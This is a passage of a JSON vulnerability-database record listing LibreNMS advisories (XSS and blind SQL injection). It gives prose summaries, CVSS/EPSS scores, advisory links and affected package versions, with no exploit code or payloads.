VC:N/VI:N/VA:N/SC:H/SI:H/SA:L/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-47523"},{"reference_url":"https://github.com/advisories/GHSA-7f84-28qh-9486","reference_id":"GHSA-7f84-28qh-9486","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7f84-28qh-9486"},{"reference_url":"https://github.com/librenms/librenms/security/advisories/GHSA-7f84-28qh-9486","reference_id":"GHSA-7f84-28qh-9486","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:L/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-02T12:57:21Z/"}],"url":"https://github.com/librenms/librenms/security/advisories/GHSA-7f84-28qh-9486"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/82814?format=json","purl":"pkg:composer/librenms/librenms@24.9.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-2z9m-fwyr-17b3"},{"vulnerability":"VCID-3prv-5fpd-c3hd"},{"vulnerability":"VCID-5f5f-pkcz-bfhr"},{"vulnerability":"VCID-5hwq-6gme-c3gh"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-98mh-t1va-xqa8"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-fc9k-4dhn-m7du"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-jjwh-716d-73hc"},{"vulnerability":"VCID-jwh7-vtxs-aqhr"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-ncgs-c7tb-gbfg"},{"vulnerability":"VCID-pksv-nv1a-sqev"},{"vulnerability":"VCID-qhpe-7ws8-kqb7"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-u45s-gxaf-vycb"},{"vulnerability":"VCID-uuwy-rk5r-tkc7"},{"vulnerability":"VCID-ux81-kyy9-bkaz"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-v3wv-6q6b-fqa3"},{"vulnerability":"VCID-vepx-waum-1bfc"},{"vulnerability":"VCID-wgnu-f2qa-9yh7"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@24.9.0"}],"aliases":["CVE-2024-47523","GHSA-7f84-28qh-9486"],"risk_score":3.4,"exploitability":"0.5","weighted_severity":"6.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-hacq-7c9c-qkaz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/48400?format=json","vulnerability_id":"VCID-hj1w-rpxt-4ygp","summary":"LibreNMS vulnerable to Reflected Cross-Site Scripting (XSS) in endpoint `/maps/nodeimage` parameter `Image Name`\nA Reflected Cross-Site Scripting (XSS) vulnerability was identified in the LibreNMS application at the `/maps/nodeimage` endpoint. The `Image Name` parameter is reflected in the HTTP response without proper output encoding or sanitization, allowing an attacker to craft a URL that, when visited by a victim, causes arbitrary JavaScript execution in the victim’s browser.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-65013","reference_id":"","reference_type":"","scores":[{"value":"2e-05","scoring_system":"epss","scoring_elements":"0.00031","published_at":"2026-06-09T12:55:00Z"},{"value":"2e-05","scoring_system":"epss","scoring_elements":"0.00032","published_at":"2026-06-08T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-65013"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-65013","reference_id":"CVE-2025-65013","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-65013"},{"reference_url":"https://github.com/advisories/GHSA-j8cq-7f6p-256x","reference_id":"GHSA-j8cq-7f6p-256x","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-j8cq-7f6p-256x"},{"reference_url":"https://github.com/librenms/librenms/security/advisories/GHSA-j8cq-7f6p-256x","reference_id":"GHSA-j8cq-7f6p-256x","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-19T14:46:48Z/"}],"url":"https://github.com/librenms/librenms/security/advisories/GHSA-j8cq-7f6p-256x"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/71437?format=json","purl":"pkg:composer/librenms/librenms@25.11.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-rq5b-4ktu-syf3"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-y5mq-m57f-b3bx"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@25.11.0"}],"aliases":["CVE-2025-65013","GHSA-j8cq-7f6p-256x"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-hj1w-rpxt-4ygp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56208?format=json","vulnerability_id":"VCID-jjwh-716d-73hc","summary":"LibreNMS has a Stored XSS ('Cross-site Scripting') in librenms/includes/html/dev-overview-data.inc.php\nA Stored Cross-Site Scripting (XSS) vulnerability in the Device Overview page allows authenticated users to inject arbitrary JavaScript through the \"overwrite_ip\" parameter when editing a device. This vulnerability results in the execution of malicious code when the device overview page is visited, potentially compromising the accounts of other users.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-51495","reference_id":"","reference_type":"","scores":[{"value":"0.00904","scoring_system":"epss","scoring_elements":"0.76117","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00904","scoring_system":"epss","scoring_elements":"0.76125","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00904","scoring_system":"epss","scoring_elements":"0.76129","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00904","scoring_system":"epss","scoring_elements":"0.76124","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00904","scoring_system":"epss","scoring_elements":"0.76105","published_at":"2026-06-08T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-51495"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/4568188ce9097a2e3a3b563311077f2bb82455c0","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-15T15:59:29Z/"}],"url":"https://github.com/librenms/librenms/commit/4568188ce9097a2e3a3b563311077f2bb82455c0"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-51495","reference_id":"CVE-2024-51495","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-51495"},{"reference_url":"https://github.com/advisories/GHSA-p66q-ppwr-q5j8","reference_id":"GHSA-p66q-ppwr-q5j8","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-p66q-ppwr-q5j8"},{"reference_url":"https://github.com/librenms/librenms/security/advisories/GHSA-p66q-ppwr-q5j8","reference_id":"GHSA-p66q-ppwr-q5j8","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-15T15:59:29Z/"}],"url":"https://github.com/librenms/librenms/security/advisories/GHSA-p66q-ppwr-q5j8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74125?format=json","purl":"pkg:composer/librenms/librenms@24.10.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-3prv-5fpd-c3hd"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-rq5b-4ktu-syf3"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-u45s-gxaf-vycb"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-wgnu-f2qa-9yh7"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@24.10.0"}],"aliases":["CVE-2024-51495","GHSA-p66q-ppwr-q5j8"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jjwh-716d-73hc"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56206?format=json","vulnerability_id":"VCID-jwh7-vtxs-aqhr","summary":"LibreNMS has a Stored XSS ('Cross-site Scripting') in librenms/includes/html/pages/device/services.inc.php\nA Stored Cross-Site Scripting (XSS) vulnerability in the \"Services\" tab of the Device page allows authenticated users to inject arbitrary JavaScript through the \"descr\" parameter when adding a service to a device. This vulnerability could result in the execution of malicious code in the context of other users' sessions, potentially compromising their accounts and enabling unauthorized actions.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-52526","reference_id":"","reference_type":"","scores":[{"value":"0.01189","scoring_system":"epss","scoring_elements":"0.7918","published_at":"2026-06-07T12:55:00Z"},{"value":"0.01189","scoring_system":"epss","scoring_elements":"0.79189","published_at":"2026-06-06T12:55:00Z"},{"value":"0.01189","scoring_system":"epss","scoring_elements":"0.79188","published_at":"2026-06-09T12:55:00Z"},{"value":"0.01189","scoring_system":"epss","scoring_elements":"0.79183","published_at":"2026-06-05T12:55:00Z"},{"value":"0.01189","scoring_system":"epss","scoring_elements":"0.79169","published_at":"2026-06-08T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-52526"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/30e522c29bbb1f9b72951025e7049a26c7e1d76e","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-15T16:38:05Z/"}],"url":"https://github.com/librenms/librenms/commit/30e522c29bbb1f9b72951025e7049a26c7e1d76e"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-52526","reference_id":"CVE-2024-52526","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-52526"},{"reference_url":"https://github.com/advisories/GHSA-8fh4-942r-jf2g","reference_id":"GHSA-8fh4-942r-jf2g","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8fh4-942r-jf2g"},{"reference_url":"https://github.com/librenms/librenms/security/advisories/GHSA-8fh4-942r-jf2g","reference_id":"GHSA-8fh4-942r-jf2g","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-15T16:38:05Z/"}],"url":"https://github.com/librenms/librenms/security/advisories/GHSA-8fh4-942r-jf2g"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74125?format=json","purl":"pkg:composer/librenms/librenms@24.10.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-3prv-5fpd-c3hd"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-rq5b-4ktu-syf3"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-u45s-gxaf-vycb"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-wgnu-f2qa-9yh7"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@24.10.0"}],"aliases":["CVE-2024-52526","GHSA-8fh4-942r-jf2g"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jwh7-vtxs-aqhr"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/48405?format=json","vulnerability_id":"VCID-kkqd-nzsw-23cr","summary":"LibreNMS is vulnerable to SQL Injection (Boolean-Based Blind) in hostname parameter in ajax_output.php endpoint\nA **Boolean-Based Blind SQL Injection** vulnerability was identified in the LibreNMS application at the `/ajax_output.php` endpoint. The `hostname` parameter is interpolated directly into an SQL query without proper sanitization or parameter binding, allowing an attacker to manipulate the query logic and infer data from the database through conditional responses.\n\n---","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-65093","reference_id":"","reference_type":"","scores":[{"value":"4e-05","scoring_system":"epss","scoring_elements":"0.00145","published_at":"2026-06-09T12:55:00Z"},{"value":"4e-05","scoring_system":"epss","scoring_elements":"0.00146","published_at":"2026-06-08T12:55:00Z"},{"value":"4e-05","scoring_system":"epss","scoring_elements":"0.00148","published_at":"2026-06-06T12:55:00Z"},{"value":"4e-05","scoring_system":"epss","scoring_elements":"0.00147","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-65093"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-65093","reference_id":"CVE-2025-65093","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-65093"},{"reference_url":"https://github.com/advisories/GHSA-6pmj-xjxp-p8g9","reference_id":"GHSA-6pmj-xjxp-p8g9","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6pmj-xjxp-p8g9"},{"reference_url":"https://github.com/librenms/librenms/security/advisories/GHSA-6pmj-xjxp-p8g9","reference_id":"GHSA-6pmj-xjxp-p8g9","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-19T14:58:37Z/"}],"url":"https://github.com/librenms/librenms/security/advisories/GHSA-6pmj-xjxp-p8g9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/71437?format=json","purl":"pkg:composer/librenms/librenms@25.11.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-rq5b-4ktu-syf3"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-y5mq-m57f-b3bx"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@25.11.0"}],"aliases":["CVE-2025-65093","GHSA-6pmj-xjxp-p8g9"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-kkqd-nzsw-23cr"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/42538?format=json","vulnerability_id":"VCID-kn2w-mmss-s7hu","summary":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')\nCross-site Scripting (XSS) - Stored in GitHub repository librenms/librenms prior to 22.2.2.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0772","reference_id":"","reference_type":"","scores":[{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.0389","published_at":"2026-06-04T12:55:00Z"},{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03903","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03906","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03883","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03867","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03891","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0772"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/703745d0ed3948623153117d761ce48514e2f281","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms/commit/703745d0ed3948623153117d761ce48514e2f281"},{"reference_url":"https://huntr.dev/bounties/faae29bd-c43a-468d-8af6-2b6aa4d40f09","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/faae29bd-c43a-468d-8af6-2b6aa4d40f09"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0772","reference_id":"CVE-2022-0772","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0772"},{"reference_url":"https://github.com/advisories/GHSA-vhm6-gw82-6f8j","reference_id":"GHSA-vhm6-gw82-6f8j","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vhm6-gw82-6f8j"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/60817?format=json","purl":"pkg:composer/librenms/librenms@22.2.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-13ug-m6cb-hbcc"},{"vulnerability":"VCID-2ccw-938t-yyaj"},{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-2w1a-3ym6-hygb"},{"vulnerability":"VCID-2z9m-fwyr-17b3"},{"vulnerability":"VCID-3b6p-2q4u-kkb5"},{"vulnerability":"VCID-5f5f-pkcz-bfhr"},{"vulnerability":"VCID-5hwq-6gme-c3gh"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-6cy6-6ss3-tqaz"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7fbt-znx9-ukaj"},{"vulnerability":"VCID-7m7b-578h-bqhj"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-7srz-umtt-n7e1"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-98mh-t1va-xqa8"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-af73-74xn-9fap"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-b67g-878z-sygx"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-cvn6-ggwj-9fcm"},{"vulnerability":"VCID-dff6-r5mp-p3d5"},{"vulnerability":"VCID-f9v9-rmse-cbcg"},{"vulnerability":"VCID-fc9k-4dhn-m7du"},{"vulnerability":"VCID-gj21-fy13-33h2"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hacq-7c9c-qkaz"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-jjwh-716d-73hc"},{"vulnerability":"VCID-jwh7-vtxs-aqhr"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-me5y-39aj-fkhe"},{"vulnerability":"VCID-mhf4-mtt1-t3fn"},{"vulnerability":"VCID-n5u3-c21p-ukas"},{"vulnerability":"VCID-ncgs-c7tb-gbfg"},{"vulnerability":"VCID-nyn8-7mkk-zbb3"},{"vulnerability":"VCID-pksv-nv1a-sqev"},{"vulnerability":"VCID-qhpe-7ws8-kqb7"},{"vulnerability":"VCID-qqnn-43db-guek"},{"vulnerability":"VCID-sa1y-ej2a-fba9"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-u1km-tzd2-5bhq"},{"vulnerability":"VCID-us6w-wwkm-dqc5"},{"vulnerability":"VCID-uuwy-rk5r-tkc7"},{"vulnerability":"VCID-ux81-kyy9-bkaz"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-v3wv-6q6b-fqa3"},{"vulnerability":"VCID-vepx-waum-1bfc"},{"vulnerability":"VCID-w5dm-5pyj-cfef"},{"vulnerability":"VCID-w9mu-bbkx-sbeq"},{"vulnerability":"VCID-whxh-v47a-8yhh"},{"vulnerability":"VCID-x1aq-5a19-yye7"},{"vulnerability":"VCID-y3qu-d719-jff6"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-y6jm-2987-9uh2"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-ywp5-cwm9-afb5"},{"vulnerability":"VCID-z744-37t6-pud6"},{"vulnerability":"VCID-zech-eg55-gbcn"}],"resource_url":"http://pub